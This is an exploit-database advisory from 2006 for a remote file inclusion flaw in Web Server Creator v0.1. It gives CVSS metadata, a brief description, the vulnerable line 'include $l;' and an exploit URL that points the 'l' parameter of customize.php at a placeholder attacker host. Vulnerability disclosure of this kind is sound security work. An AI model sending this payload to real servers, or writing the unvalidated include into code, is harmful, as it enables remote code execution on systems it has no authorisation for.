Web Server Creator v0.1 (l) Remote Include Vulnerability

vendor:

Web Server Creator

by:

XORON

7,5

CVSS

HIGH

Remote Include Vulnerability

CWE

Product Name: Web Server Creator

Affected Version From: v0.1

Affected Version To: v0.1

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Web Server Creator v0.1 (l) Remote Include Vulnerability

A remote include vulnerability exists in Web Server Creator v0.1, which allows an attacker to include a remote file via the 'l' parameter in the customize.php script.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files.

Source

Exploit-DB raw data:

###########################################################

#Web Server Creator v0.1 (l) Remote Include Vulnerability

############################################################

#Author: XORON

############################################################

#URL: http://www.comscripts.com/jump.php?action=script&id=1082

############################################################

#Class: Remote

############################################################

#cont@ct: x0r0n[at]hotmail[dot]com

############################################################

#Code:   include $l;

############################################################

#Exploit:
http://www.site.com/[path]/news/include/customize.php?l=http://evil_scripts?

############################################################

#Greetz: str0ke, Ironfist, Preddy, SHiKaA,  gültekin

############################################################

# milw0rm.com [2006-09-07]